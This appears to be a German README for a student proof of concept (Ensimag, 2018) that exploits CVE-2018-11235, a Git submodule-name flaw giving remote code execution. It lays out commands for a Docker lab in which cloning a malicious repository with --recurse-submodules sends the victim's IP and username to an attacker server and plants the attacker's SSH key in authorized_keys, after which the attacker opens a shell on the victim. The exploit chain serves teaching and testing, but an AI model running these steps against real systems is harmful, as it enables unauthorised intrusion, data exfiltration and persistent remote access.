
Proof of Concept - RCE-Ausnutzung : Schwachstelle in den Namen von Git-Submodulen - Ensimag November 2018
Um die Docker-Container zu bauen, verwenden Sie:
make docker
(Die folgenden make-Befehle sollten parallel auf verschiedenen Terminals auf Ihrer Maschine ausgeführt werden)
Um den Container des Angreiferservers zu starten, verwenden Sie:
make run_server
Um den Container, der das Opfer darstellt, zu starten, verwenden Sie:
make run_client
Der Container wird das Skript client.py ausführen. Das Skript wird seine IP-Adresse und seinen Benutzernamen an den Angreifer übermitteln.
Befolgen Sie die Anweisungen der Client-Konsole, um das bösartige Git-Repository zu klonen.
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
Sie werden feststellen, dass die IP-Adresse und der Benutzername des Opfers an den Server übermittelt werden.
Nach dem Klonen überprüfen Sie, ob der öffentliche Schlüssel der Angreifer zu den authorized_keys des Clients hinzugefügt wurde.
Anschließend können Sie eine Shell auf dem Client vom Server aus öffnen, mit dem folgenden Befehl (auf Ihrer Maschine auszuführen):
make server_bash
ssh <transmitted_username>@<transmitted_host>
Wenn Sie Probleme bei der Ausführung dieses Proof of Concept haben, erstellen Sie bitte ein Issue in diesem Repository: https://github.com/ygouzerh/CVE-2018-11235/issues , wir werden Ihnen so schnell wie möglich antworten.